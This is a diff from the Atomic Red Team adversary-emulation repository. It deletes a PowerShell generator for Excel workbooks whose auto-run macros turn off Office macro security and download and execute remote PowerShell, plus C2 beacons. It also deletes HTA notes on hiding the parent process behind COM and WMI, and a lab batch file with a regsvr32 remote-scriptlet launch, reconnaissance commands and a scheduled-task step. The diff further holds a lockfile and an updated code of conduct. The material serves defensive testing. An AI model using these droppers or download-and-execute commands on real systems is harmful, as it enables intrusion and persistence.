-    objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
-End Sub
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Com-Trampoline {
-<#
-    .SYNOPSIS
-      Excel COM Trampoline.
-    .DESCRIPTION
-      Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a chain reaction.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-    Const ShellWindows = _
-    "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
-    Set SW = GetObject("new:" & ShellWindows).Item()
-    SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
-End Sub
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Com-ShellBrowserWindow {
-<#
-    .SYNOPSIS
-      Excel COM Trampoline.
-    .DESCRIPTION
-      Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-    Const ShellBrowserWindow = _
-    "{C08AFD90-F2A1-11D1-8455-00A0C91F3880}"
-    Set SBW = GetObject("new:" & ShellBrowserWindow)
-    SBW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
-End Sub
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Com-wshshell {
-<#
-    .SYNOPSIS
-      Excel COM WshShell.
-    .DESCRIPTION
-      Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-    Set WshShell = CreateObject("WScript.Shell")
-    Set WshShellExec = WshShell.Exec("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')")
-End Sub
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Shell-C2-GET {
-<#
-    .SYNOPSIS
-      Standard macro execution.
-    .DESCRIPTION
-      Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-
-Execute
-C2
-
-End Sub
-
-Public Function Execute() As Variant
-    Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
-End Function
-
-Public Function C2() As Variant
-Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
-URL = "http://www.example.com"
-objHTTP.Open "GET", URL, False
-objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
-objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
-objHTTP.send ("ART=AtomicRedTeam")
-End Function
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Shell-C2-POST {
-<#
-    .SYNOPSIS
-      Standard macro execution.
-    .DESCRIPTION
-      Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-
-Execute
-C2
-
-End Sub
-
-Public Function Execute() As Variant
-    Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
-End Function
-
-Public Function C2() As Variant
-Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
-URL = "http://www.example.com"
-objHTTP.Open "POST", URL, False
-objHTTP.setRequestHeader "User-Agent", "Mozilla (compatible; MSIE 6.0; Windows NT 5.0)"
-objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
-objHTTP.send ("ART=AtomicRedTeam")
-End Function
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-#Determine Attack
-Do {
-Write-Host "
---------Select Attack---------
-1. Chain Reaction Download and execute with Excel.
-2. Chain Reaction Download and execute with Excel, wmiprvse
-3. Chain Reaction Download and execute with Excel, wmiprvse benign
-4. Chain Reaction Download and execute with Excel Shell
-5. Chain Reaction Download and execute with Excel ShellBrowserWindow
-6. Chain Reaction Download and execute with Excel WshShell
-7. Chain Reaction Download and execute with Excel and POST C2.
-8. Chain Reaction Download and execute with Excel and GET C2.
-------------------------------"
-$AttackNum = Read-Host -prompt "Select Attack Number & Press Enter"
-} until ($AttackNum -eq "1" -or $AttackNum -eq "2" -or $AttackNum -eq "3" -or $AttackNum -eq "4" -or $AttackNum -eq "5" -or $AttackNum -eq "6" -or $AttackNum -eq "7" -or $AttackNum -eq "8")
-
-
-#Initiate Attack Choice
-
-if($AttackNum -eq "1"){
-    Excel-Com-Trampoline
-}
-elseif($AttackNum -eq "2"){
-    Excel-Com-Wmiprvse-Trampoline
-}
-elseif($AttackNum -eq "3"){
-    Excel-Com-Wmiprvse-Benign-Trampoline
-}
-elseif($AttackNum -eq "4"){
-    Excel-Shell
-}
-elseif($AttackNum -eq "5"){
-    Excel-Com-ShellBrowserWindow
-}
-elseif($AttackNum -eq "6"){
-    Excel-Com-wshshell
-}
-elseif($AttackNum -eq "7"){
-    Excel-Shell-C2-POST
-}
-elseif($AttackNum -eq "8"){
-    Excel-Shell-C2-GET
-}

ARTifacts/Initial_Access/hta.md

@@ -1,43 +0,0 @@
-# HTA
-
-## AtomicHTA
-
-Three ways to spawn calc using HTA. Each are customizable to download a chain reaction to perform additional behaviors.
-
-## MSHTA - Explorer Spawning CMD
-
-Using COM objects, mshta runs with no child processes. Explorer.exe spawns and executes cmd -> calc.
-
-```
-// Type One
-// Child of Explorer, cmd.exe
-var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
-var SW = GetObject("new:" + ShellWindows).Item();
-SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
-```
-
-## MSHTA - Wmiprvse Spawning CMD
-
-Using COM objects, mshta runs with no child processes. Wmiprvse spawns and executes cmd -> calc.
-
-```
-// Type Two
-// Child of wmiprvse
-var strComputer = ".";
-var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
-var objStartup = objWMIService.Get("Win32_ProcessStartup");
-var objConfig = objStartup.SpawnInstance_();
-objConfig.ShowWindow = 0;
-var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
-var intProcessID;
-objProcess.Create("cmd.exe", null, objConfig, intProcessID);
-```
-## MSHTA spawning CMD
-
-Mshta spawns child process of calc.exe.
-
-```
-// Type Three
-// Child of mshta.exe
-var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
-```

ARTifacts/Labs/Webinar11062017-Labs.bat

@@ -1,36 +0,0 @@
-:: Basic Test Lab One
-:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
-::
-
-regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
-
-:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
-:: NOTE We recommend executing from a server that you control.
-:: NOTE Thank You :)
-
-
-:: Lab Two
-:: Chain Reactions - Chaining Multiple ATOMIC Test
-:: Lets have some fun shall we ;-)
-:: Techniques rarely occur in isolation
-:: In the Attack Lets combine 3 Techniques
-:: You can customize tests
-
-:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
-
-regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
-
-:: Step 2. This payload will execute an discovery sequence T1087
-::    https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
-::	  Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
-
-net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
-
-:: Step 3. We will setup some persistence by creating a scheduled task. T1053
-::    Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
-
-SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
-
-::    We will also just go ahead and clean up the task.
-
-SCHTASKS /Delete /TN Spawn /F

ARTifacts/Misc/flag.txt

@@ -1 +0,0 @@
-Downloaded Remote Content

CODE_OF_CONDUCT.md

@@ -1,42 +1,58 @@
-# Contributor Covenant Code of Conduct
+# Contributor Code of Conduct
 
-## Our Pledge
+Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation. 
 
-In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+## Our Guidelines
 
-## Our Standards
+### Acceptable Behavior
 
-Examples of behavior that contributes to creating a positive environment include:
-
-* Using welcoming and inclusive language
+* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
 * Being respectful of differing viewpoints and experiences
 * Gracefully accepting constructive criticism
-* Focusing on what is best for the community
-* Showing empathy towards other community members
+* Focusing on what is best for the community and what supports engagement
+* Showing compassion and understanding towards other community members
 
-Examples of unacceptable behavior by participants include:
+### Unacceptable Behavior
 
-* The use of sexualized language or imagery and unwelcome sexual attention or advances
-* Trolling, insulting/derogatory comments, and personal or political attacks
-* Public or private harassment
-* Publishing others' private information, such as a physical or electronic address, without explicit permission
-* Other conduct which could reasonably be considered inappropriate in a professional setting
+* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
+  * Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
+* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
+* Harassing individuals in a public or private form.
+* Publishing others' private information, such as a physical or email address, without explicit permission
+* Other conduct that could reasonably be considered inappropriate in a professional setting
 
-## Our Responsibilities
+## Reporting
 
-Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+If you see anything that you believe breaks our community guidelines, no matter if it’s privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
 
-Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+## Enforcement & Consequences
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members.  The Atomic Red Team Community Manager and maintainers will review and investigate all complaints. 
+
+Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://atomicredteam.io/slack)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
+
+Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Manager’s & Maintainers’ Responsibilities
+
+Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
 
 ## Scope
 
-This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
 
-## Enforcement
+* [Atomic Red Team Website](https://atomicredteam.io/)
 
-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+* [Atomic Red Team Slack](https://atomicredteam.io/slack)
 
-Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
+
+* **Atomic Family**  
+  * [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam) 
+  * [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses) 
+  * [Chain Reactor](https://github.com/redcanaryco/chain-reactor) 
 
 ## Attribution
 

Gemfile.lock

@@ -1,267 +0,0 @@
-PATH
-  remote: .
-  specs:
-    atomic-red-team (1.0)
-
-GEM
-  remote: https://rubygems.org/
-  specs:
-    activesupport (6.0.3.4)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
-      i18n (>= 0.7, < 2)
-      minitest (~> 5.1)
-      tzinfo (~> 1.1)
-      zeitwerk (~> 2.2, >= 2.2.2)
-    addressable (2.7.0)
-      public_suffix (>= 2.0.2, < 5.0)
-    coffee-script (2.4.1)
-      coffee-script-source
-      execjs
-    coffee-script-source (1.11.1)
-    colorator (1.1.0)
-    commonmarker (0.17.13)
-      ruby-enum (~> 0.5)
-    concurrent-ruby (1.1.7)
-    dnsruby (1.61.5)
-      simpleidn (~> 0.1)
-    em-websocket (0.5.2)
-      eventmachine (>= 0.12.9)
-      http_parser.rb (~> 0.6.0)
-    ethon (0.12.0)
-      ffi (>= 1.3.0)
-    eventmachine (1.2.7)
-    execjs (2.7.0)
-    faraday (1.1.0)
-      multipart-post (>= 1.2, < 3)
-      ruby2_keywords
-    ffi (1.13.1)
-    forwardable-extended (2.6.0)
-    gemoji (3.0.1)
-    github-pages (209)
-      github-pages-health-check (= 1.16.1)
-      jekyll (= 3.9.0)
-      jekyll-avatar (= 0.7.0)
-      jekyll-coffeescript (= 1.1.1)
-      jekyll-commonmark-ghpages (= 0.1.6)
-      jekyll-default-layout (= 0.1.4)
-      jekyll-feed (= 0.15.1)
-      jekyll-gist (= 1.5.0)
-      jekyll-github-metadata (= 2.13.0)
-      jekyll-mentions (= 1.6.0)
-      jekyll-optional-front-matter (= 0.3.2)
-      jekyll-paginate (= 1.1.0)
-      jekyll-readme-index (= 0.3.0)
-      jekyll-redirect-from (= 0.16.0)
-      jekyll-relative-links (= 0.6.1)
-      jekyll-remote-theme (= 0.4.2)
-      jekyll-sass-converter (= 1.5.2)
-      jekyll-seo-tag (= 2.6.1)
-      jekyll-sitemap (= 1.4.0)
-      jekyll-swiss (= 1.0.0)
-      jekyll-theme-architect (= 0.1.1)
-      jekyll-theme-cayman (= 0.1.1)
-      jekyll-theme-dinky (= 0.1.1)
-      jekyll-theme-hacker (= 0.1.2)
-      jekyll-theme-leap-day (= 0.1.1)
-      jekyll-theme-merlot (= 0.1.1)
-      jekyll-theme-midnight (= 0.1.1)
-      jekyll-theme-minimal (= 0.1.1)
-      jekyll-theme-modernist (= 0.1.1)
-      jekyll-theme-primer (= 0.5.4)
-      jekyll-theme-slate (= 0.1.1)
-      jekyll-theme-tactile (= 0.1.1)
-      jekyll-theme-time-machine (= 0.1.1)
-      jekyll-titles-from-headings (= 0.5.3)
-      jemoji (= 0.12.0)
-      kramdown (= 2.3.0)
-      kramdown-parser-gfm (= 1.1.0)
-      liquid (= 4.0.3)
-      mercenary (~> 0.3)
-      minima (= 2.5.1)
-      nokogiri (>= 1.10.4, < 2.0)
-      rouge (= 3.23.0)
-      terminal-table (~> 1.4)
-    github-pages-health-check (1.16.1)
-      addressable (~> 2.3)
-      dnsruby (~> 1.60)
-      octokit (~> 4.0)
-      public_suffix (~> 3.0)
-      typhoeus (~> 1.3)
-    html-pipeline (2.14.0)
-      activesupport (>= 2)
-      nokogiri (>= 1.4)
-    http_parser.rb (0.6.0)
-    i18n (0.9.5)
-      concurrent-ruby (~> 1.0)
-    jekyll (3.9.0)
-      addressable (~> 2.4)
-      colorator (~> 1.0)
-      em-websocket (~> 0.5)
-      i18n (~> 0.7)
-      jekyll-sass-converter (~> 1.0)
-      jekyll-watch (~> 2.0)
-      kramdown (>= 1.17, < 3)
-      liquid (~> 4.0)
-      mercenary (~> 0.3.3)
-      pathutil (~> 0.9)
-      rouge (>= 1.7, < 4)
-      safe_yaml (~> 1.0)
-    jekyll-avatar (0.7.0)
-      jekyll (>= 3.0, < 5.0)
-    jekyll-coffeescript (1.1.1)
-      coffee-script (~> 2.2)
